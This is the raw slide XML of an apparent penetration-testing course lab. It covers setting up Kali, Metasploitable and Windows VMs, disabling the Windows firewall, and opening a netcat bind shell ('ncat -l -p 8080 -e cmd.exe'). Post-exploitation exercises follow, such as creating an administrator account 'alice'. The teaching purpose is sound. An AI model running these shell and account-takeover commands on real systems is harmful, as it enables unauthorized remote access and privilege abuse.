              <a:t>https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Privilege Escalation IS POSSIBLE but more difficult</a:t>
            </a:r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Not Recommended: Use your host machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>We're changing settings and exploiting things. Don't do this to your actual PC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Setup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Unzip, and import with default settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>After import, go into VM settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Increase video memory to at least 32MB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Win10 may give you errors otherwise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Login - Password: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Passw0rd!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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560" y="3807280"/>
            <a:ext cx="2363219" cy="1234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C1498-DFAC-4559-89E0-6D5540BEC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560" y="577891"/>
            <a:ext cx="2203893" cy="2974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651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Lab Setup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will also use:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Virtualized Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Virtualized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploitable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Host-only networking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>You may run your own networking setup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the following config here and next slide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example network settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No DHCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows		10.10.0.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kali Linux		10.10.0.10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	10.10.0.20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You don't have to follow these settings but it will help the lab flow since hosts will not always be names but only listed by IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you are using your local Windows machine, it should default to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>10.10.0.1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88" y="536429"/>
            <a:ext cx="2975217" cy="2400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88C77A-9178-F34A-B1FD-F2CA22BE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170" y="3205738"/>
            <a:ext cx="4161472" cy="325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E4955-2A20-1049-B5DB-ED2348F55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93" y="3582223"/>
            <a:ext cx="6773034" cy="1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4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Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp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Labs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101378" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body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Exploitation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Fixing an exploit-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl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Post Exploitation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Relaying with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Netcat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Windows Command Shell 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Windows PowerShell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Routing through other hosts to attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl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Cross Compiling an Exploit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MinGW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl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400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VirtualBox Setup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For each VM </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Devices -&gt; Network -&gt; Network Settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Select "Host-only Adapter"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7B065-32E9-4007-AE38-1A0943E4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01" y="944154"/>
            <a:ext cx="3065035" cy="2676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6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Windows Software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49877" y="914829"/>
            <a:ext cx="8572840" cy="395509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 sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Install ncat.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Download on Host or right to VM if NAT/Bridged</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>https://nmap.org/dist/nmap-7.91-setup.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Host-only instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Make sure to enable </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Drag and drop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Bidrectional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> clipboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Drag and drop the zip into the VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Or use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> to copy files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Install</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>may</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> also need to install Visual C++ Redistributable Packages for Visual Studio 2013</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>It comes bundled with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> if you got the latest version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.microsoft.com/en-US/download/details.aspx?id=40784</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Download it (x64) and drag it in, and then install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96" y="1923099"/>
            <a:ext cx="1888377" cy="1168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677" y="488263"/>
            <a:ext cx="1801091" cy="1335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985" y="3770525"/>
            <a:ext cx="1135732" cy="1297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77E18-F694-4D5E-8C32-06D18D1BBE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52"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4025587" y="1923099"/>
            <a:ext cx="3009314" cy="10860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286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8B929-34B6-413D-9468-914B51F786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Install nmap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F6DD46-0C9F-43AD-8E67-41AB87AD7D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Install only components for nmap and ncat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13E23-9111-436D-BB2D-019A7652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06" y="1337911"/>
            <a:ext cx="3018336" cy="2345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DAF28-A15A-4D5E-9610-02FF3DC4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850" y="2319935"/>
            <a:ext cx="3121977" cy="2442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503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IP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4655" y="944910"/>
            <a:ext cx="3608758" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The steps to set your IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="346075" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Right click your network icon in the lower right corner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346075" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>"Open Network Sharing Center"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346075" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Right click your adapter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346075" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346075" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IPv4 Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346075" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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76" y="921704"/>
            <a:ext cx="5105665" cy="4120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947057" y="3063240"/>
            <a:ext cx="6194961" cy="476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1724297" y="2893423"/>
            <a:ext cx="4136176" cy="431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273629" y="2571750"/>
            <a:ext cx="3097480" cy="1238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660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EC550-D015-4CA7-8F30-E4CB6C71E6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PowerShell in Kali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FA2BD-5848-49DF-A9E7-16CEB95CC1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Additional setup for later - Installing PowerShell in Kali:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> apt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pwsh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D4CEA-AAA0-AD40-A4E8-0ED8E9AA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32" y="1682496"/>
            <a:ext cx="5524536" cy="3194303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18958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Windows Command Line Lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1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70888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CMD Line Challenge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6726" y="1062079"/>
            <a:ext cx="5714658" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>We reviewed many useful commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Lets have some fun</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Warm up:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Make sure we can ping all machines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From Windows 10.10.0.5, ping Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Open up an administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> window</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Should be good! If not, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Double check network config in VirtualBox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Double check IP settings for both machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Disable Windows firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>advfirewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>allprofiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> state off</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Then ping Windows from Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Success!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76" y="594523"/>
            <a:ext cx="2883718" cy="33381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4419600" y="1746680"/>
            <a:ext cx="2279073" cy="1335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792568" y="4167165"/>
            <a:ext cx="861185" cy="307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AF515A4-4A22-2A41-8D8C-30EBF82C7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753" y="4167165"/>
            <a:ext cx="3013767" cy="728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175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Connect to Windows from Kali via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>NetCat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In an administrative CMD window, start a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>ncat.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Connect to it with Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This will be our simulated remote shell for post exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exploiting a process can make the system unstable, unpredictable results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The lab is meant to be a moment to practice, repeatable results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Next slide will provide commands but try to do it yourself</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="437441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5400"/>
              <a:t>Spoiler ahead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81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Connect to Windows from Kali via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>NetCat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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it-IT" dirty="0"/>
              <a:t>Windows: CMD terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> -l -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> 8080 -e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1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r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>: Terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>kali@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>:~$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> 10.10.0.5 8080</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Windows [Version 10.0.14393]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(c) 2018 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C:\&gt;</a:t>
            </a:r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8FBEE-0DB8-5048-B0F9-81E6B033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53" y="1550321"/>
            <a:ext cx="4749800" cy="304800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CC3F6-1D50-664F-AA27-28952CB8B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53" y="3288380"/>
            <a:ext cx="5461000" cy="1409700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615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Fixing and Running an Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US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26019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remote commands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Perform the following tasks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Figure out the current user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get a list of all accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get a list of users in the local administrators group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add a new account, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>alice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Add Alice to the administrators group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verify that she is in there</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use something like 'grep' since we only need to verify that she is there</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try running a new command shell as Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3676964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5400"/>
              <a:t>Spoiler ahead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380885" y="106258"/>
            <a:ext cx="6527400" cy="586477"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows remote commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Answer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9068" y="4601689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Everything worked until we needed to enter a password!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14A82-0757-5643-81C6-86A086D28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76" y="1119279"/>
            <a:ext cx="4263609" cy="322682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7073434" y="2244843"/>
            <a:ext cx="675734" cy="474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7180333" y="2719031"/>
            <a:ext cx="581049" cy="64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79333" y="2985642"/>
            <a:ext cx="1635851" cy="474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We can use "find" like "grep"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5703583" y="4125542"/>
            <a:ext cx="398202" cy="581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4C96DF2-EC36-5B45-82A3-B003815C9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14" y="1626366"/>
            <a:ext cx="3508256" cy="22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23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remote commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Answer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800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 10.10.0.5 8080</a:t>
            </a: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Microsoft Windows [Version 10.0.14393]</a:t>
            </a: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(c) 2016 Microsoft Corporation. All rights reserved.	</a:t>
            </a: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	</a:t>
            </a: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C:\&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0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 sz="800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0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msedgewin10\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ieuser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"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sz="800" dirty="0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C:\&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>net user</a:t>
            </a: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net user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" dirty="0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User accounts for \\MSEDGEWIN10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" dirty="0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-------------------------------------------------------------------------------</a:t>
            </a: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Administrator            </a:t>
